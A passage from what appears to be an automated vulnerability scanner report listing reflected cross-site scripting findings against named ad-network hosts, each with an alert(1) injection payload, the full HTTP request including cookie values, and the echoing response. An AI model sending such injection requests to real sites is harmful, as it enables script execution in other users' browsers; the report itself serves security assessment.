'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://floridatoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=13767&48826'-alert(1)-'7bb1993fb0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.54. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedca'-alert(1)-'239f7d9d658 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))BAdco)Wh]f7y?S'<HuAT(p@Qw9/AE-(4U+vPzGLjvFYk+nwysnbZ%yhp+G^!>mHJ/[Qn^SOF-W3Xf4z<*dQUsD:-u*1$#oEh8TFFha?sqBS/]6^U*/DbYg]Mqr2:Vrct.WtC2KToR@.$C)m(E`TsR*PohR2#_*h3662#-/tB6eZAKR#N:HS+e/G^B=:]G41iy*]23/(BwUCth]o51ZN_d27HnxGMo'uGGi(0X6$G(F[[<8?bE841yayI#UtGV.cq'ri('l!6LQJWN9l2cQoV*iH]11`lAb^b)0'xX=oN/+4vHi'1gSOc<9S4EE#@*(d7)k=U8C:JN%F-F4S3G$R:hjq><pByr`w=(:CAj+.g-MCVWn_u4R:k)M3w5#XRmD0G`[FsG_#6$(1LQv'bPN@3tQ##@s758hws:.[A7a/=+]WZ_fuE/MN<Btb/ToI#4D^oB.M7l2j2mjE_@Bzt<s``c/L5dxwk2KDKIFkz]gq-b4i]Sr8x.$v]gGt`l9(lXF6KaOm][.o$F:sQaS<6[()-<5$NWVFtbjNC!m2d_!77Iw`jK:R1Y%$$(MKIm5.<][BBy!>2Q!7Lhus`)aMi%9I7E.:UZOfpwq^nA-UOE0NIUorSW3hNy; path=/; expires=Sun, 07-Aug-2011 14:01:02 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:02 GMT
Content-Length: 1468

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAASS3fXgAAAAA./cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQCaedca'-alert(1)-'239f7d9d658/referrer=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages/clickenc=http%3A%2F%2Fwww.1800flowers.com%2Frefer.do%3Fr%3
...[SNIP]...

3.55. http://ib.adnxs.com/ab [custom_macro parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676e8'%3balert(1)//ac3354cabe was submitted in the custom_macro parameter. This input was echoed as 676e8';alert(1)//ac3354cabe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8676e8'%3balert(1)//ac3354cabe&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vt>vMr8g<B)#kQD2BQ%KJQUPq'0FP0G>i/e:Qc*>v.pXxAzo0EmQU<wKU!?-n$)FuX+9::dG9$]P=bB9=KQ3VDqSp>]+c$9xZgM0:#`mv`egs9[Zs#Tm8tKRN[(IqkzJsrKg#Il/>mh'Aw`7Y7j?03ZmAl8.J)NHKIE>]===+mPT2IDg(oYoU6mwDQJZ>k/JXf11=8a*m0NKBz>LI_kuKVy<>xeO1cNsy?[h0iVz>1Z!:K2zPM$>)62*@?wi/i1l9)s2T=Z0:MIlHiRYm!jT:CV2hPWmTjX6I]dq<@$i?62FM[?>NEQqOTgzZhjQh7B^M/'0yu[>bUhl/X=[w[*`ootb('G4k=aZ5wnPmF5t7HIvrz7#I3C<^2/j3wcQ5Q[TxNH:3lOzx^F^4X^U(#mPpW[w(HpOWk.Mg87T3<t+<g[>jaB4phea329Q9Q:oIk.ah$W8jmjmq[u[Rq45%Z+Tw-X%07JfHyq[eTsKZC6Zp%L2Mq5VPFc])io#nF$(8yxjqkwSzMH1/Y0=>7(.3eEJP$k64/Cq'*33Bi3ib:R)BiMQhKJQB.VpW`%@X>AZWwAWvE)DqcSYa`.:C_o)CPSUzd3zH72eX(`=wzAW4hEdk*; path=/; expires=Sun, 07-Aug-2011 14:01:13 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:13 GMT
Content-Length: 1518

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=H26G&n_cid=47078&crid=300x250_8F_Interim_finalgif&n_crid=327251&mpm=CPM&n_g=u&n_a=0&aids=H26G-8676e8';alert(1)//ac3354cabe&n_price=1.511628&n_bust=1304949616&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-x-_-x15off-_-postvday%26cm_mmca1%3D30
...[SNIP]...

3.56. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10ad'%3balert(1)//60a1fb087ec was submitted in the redir parameter. This input was echoed as f10ad';alert(1)//60a1fb087ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3Ff10ad'%3balert(1)//60a1fb087ec HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEw7eaf7gQQ7eaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb133666=5_[r^202nWv$PLv0nf8M[Ys2+?enc=rkfhehSu4z-DwMqhRbbhPwAAAAAAAPA_g8DKoUW24T-uR-F6FK7jPzb1FLF9zeROSsYda6b2ziVt88dNAAAAALY-AwA3AQAAGgEAAAIAAACrJgQAkWAAAAEAAABVU0QAVVNEACwBWAKqAQAA3wsBAgUCAAUAAAAARyUkjgAAAAA.&tt_code=cm.tribune&udj=uf%28%27a%27%2C+2248%2C+1304949613%29%3Buf%28%27c%27%2C+61473%2C+1304949613%29%3Buf%28%27r%27%2C+272043%2C+1304949613%29%3Bppv%287166%2C+%275684894569373955382%27%2C+1304949613%2C+1336485613%2C+61473%2C+24721%29%3B&cnd=!AxYOawih4AMQq80QGAAgkcEBKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[7Pl_F#:3V_M'dWhq<A4H9QLwh!0(2d(:ZyP'RCvb./f.(AQEh7GXym(].`Qj0%7`fZ:(E9V)IjhpWXS^efpCN#M1:-ppF^x.X)sgXP^jl:%[)rcMuH4Nf@kf+1^R-)S>XM5XPrPErAzb4-^a4y@Jx`bv:za2Z1YQHReEE7N'0=1'b#WYayc'16yUR#PmqgRNSeu>Hnq$4n5N(wZhI:G3G^w>>s-.6hU<:[/xh9)p3_0)uj3eO+Cv-/*(0$W`5v[FaE-1r0pCXmB`tyV$2!luhmrx>S#*].(5s.Z!F=sL>?ZMLXXKeCE$`f%U#<.Vr(2YPMbq8r*Oyu2`zKCrSA0w6kFos`u*A@=8(6<k:P1rsXF`Rd0.w(7ba)>_Mpgwbe*2/`rux6!0iVYbij2Z6nZ-c?cOa#n^<Ga:jYoKIKQ0t(nw9!0a(!oOgpu*?'%%gRXF)1hx-CUx5u`W-8Ct+Qm60WPMsHmUS/>#4OdTJx+KCMm*E:=KUCI8M4DN=ZhjFId#K??]aY=yV(aaiJ*!T(Cj/Rd*6LcB16Pp'4k9L2b0d1v*[w(H]u'0ytiMqP2wZM+I$`:y#ChV=lN%9$vaKzY3; path=/; expires=Sun, 07-Aug-2011 14:00:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:00:13 GMT
Content-Length: 650

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.40-cm.ent_l-cm.music_h-
...[SNIP]...
;sz=300x600;net=cm;ord1=680525;contx=ent;an=40;dc=w;btg=cm.ent_l;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=5044004?f10ad';alert(1)//60a1fb087ec">
...[SNIP]...

3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c772f"-alert(1)-"078d1e6149 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949708_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:48 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:48 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 325

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=c772f"-alert(1)-"078d1e6149' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ea5"-alert(1)-"d84ddfca88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:25 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949745_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:02:25 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:02:25 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 329

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=&c0ea5"-alert(1)-"d84ddfca88c=1' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 346f9"-alert(1)-"99b469e8563 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; uid=1_1304903354_1303179323923:6792170478871670; kwd=1_1304903354_12936:208292_11317:1160086_11717:1160086_11718:1160086_11719:1160086; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; cre=1_1304903354_29802:59536:1:542383_29805:59534:1:543044; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; scg=1_1304903354; ppd=1_1304903354; afl=1_1304903354

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:43 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949703_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

